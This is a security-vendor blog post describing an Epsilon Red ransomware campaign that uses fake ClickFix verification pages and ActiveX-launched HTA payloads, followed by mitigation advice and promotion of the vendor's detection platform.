Following closely after the Interlock ransomware attacks that used a new custom RAT delivered through a modified ClickFix variant called FileFix, a new malicious campaign has emerged, also leveraging a ClickFix-themed malware delivery website. Defenders have uncovered a novel global Epsilon Red ransomware operation that began in July 2025, in which attackers use fake ClickFix verification pages and impersonate multiple popular platforms to deceive users. The campaign relies on social engineering tactics to prompt victims to execute malicious HTA files via ActiveX, triggering covert payload delivery and ransomware execution.
Epsilon Red Ransomware Attacks Detection
In Q1 2025, Check Point observed a 126% surge in ransomware attacks, with the average daily incident count reaching 275—a 47% increase year-over-year. Insights from Symantec’s The State of Ransomware 2025 report highlight several operational vulnerabilities that leave organizations exposed. The most frequently cited issue was a lack of in-house expertise, identified by 40.2% of affected organizations. Close behind, unidentified security gaps were responsible in 40.1% of cases. Rounding out the top three was insufficient personnel or capacity, contributing to 39.4% of successful attacks.
While novel ransomware strains continue to emerge and threat actors adopt new delivery techniques, such as the Click-Fix method used with Epsilon Red, cyber defenders must rely on timely, high-quality detection content and advanced cybersecurity tools to keep pace with the rapidly evolving threat landscape.
Register for the SOC Prime Platform to detect potential threats, like Epsilon Red ransomware, at the earliest possible stage. The Platform delivers timely threat intelligence and actionable detection content, backed by a complete product suite for AI-powered detection engineering, automated threat hunting, and advanced threat detection. Click the Explore Detections button below to access a curated stack of detection rules designed to identify and respond to Epsilon Red ransomware activity.
All the rules in the SOC Prime Platform are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework. Additionally, each rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.
Optionally, cyber defenders can apply the broader “Ransomware” tag to access a wider range of detection rules covering ransomware attacks globally.
Additionally, security experts might streamline threat investigation using Uncoder AI, a private IDE & co-pilot for threat-informed detection engineering. Generate detection algorithms from raw threat reports, enable fast IOC sweeps, predict ATT&CK tags, optimize query code with AI tips, and translate it across multiple SIEM, EDR, and Data Lake languages. For instance, security professionals can use CloudSEK’s TRIAD team research to generate an Attack Flow diagram in a few clicks.
Epsilon Red Ransomware Attack Analysis
In May 2021, Sophos researchers identified a new ransomware variant dubbed Epsilon Red while examining an incident involving a U.S.-based hospitality company. Developed in Go and compiled as a 64-bit Windows binary, the malware focused solely on file encryption, delegating all other attack tasks—such as system preparation and execution—to more than a dozen PowerShell scripts. Despite their relatively simple obfuscation, these scripts successfully evaded detection by most mainstream antivirus solutions. The ransom note bears notable stylistic and grammatical similarities to those used by the REvil group, hinting at a potential link, though the malware’s techniques and operational infrastructure are otherwise unique.
The CloudSEK’s TRIAD team has recently discovered a ClickFix-style malware distribution site tied to the Epsilon Red ransomware, which was still under active development. Unlike earlier variants that relied on clipboard-based payload execution, this campaign directs users to a secondary page where malicious shell commands are executed stealthily via ActiveX, allowing payloads to be downloaded and run from attacker-controlled IP addresses. The campaign uses deceptive tactics like fake verification prompts to appear legitimate. Further infrastructure analysis revealed spoofed services including Discord Captcha Bot, Kick, Twitch, and OnlyFans, along with romance-themed social engineering lures.
The campaign poses significant risks, starting with endpoint compromise through web browsers. By exploiting the ActiveXObject interface, attackers can execute malicious code remotely during a user’s browser session, effectively bypassing standard download defenses. This technique paves the way for deeper system infiltration, including lateral movement and eventual ransomware deployment.
Compounding the threat, attackers employ brand impersonation by mimicking familiar services, like Discord CAPTCHA and popular streaming platforms, to lower user suspicion and increase the effectiveness of social engineering. The recurring use of themed malware delivery sites, such as ClickFix clones and romance-related lures, highlights a deliberate strategy and sustained infrastructure, suggesting a well-planned and ongoing threat operation.
As potential Epsilon Red ransomware mitigation measures, organizations should disable legacy scripting interfaces such as ActiveX and Windows Script Host using Group Policies across all systems. Integrating real-time threat intelligence feeds is critical to block known attacker-controlled IPs, domains, and IOCs linked to ClickFix-related operations. In addition, regular security awareness training should simulate impersonation scenarios involving popular platforms like Discord and Twitch to prepare users to recognize and avoid fake verification pages and social engineering lures. To stay ahead of ransomware attacks and other emerging threats of any scale and sophistication, organizations can leverage SOC Prime’s complete product suite blacked by AI, automation, and real-time CTI while strengthening their defenses at scale.
The post Epsilon Red Ransomware Detection: New Adversary Campaign Targeting Users Globally via ClickFix appeared first on SOC Prime.
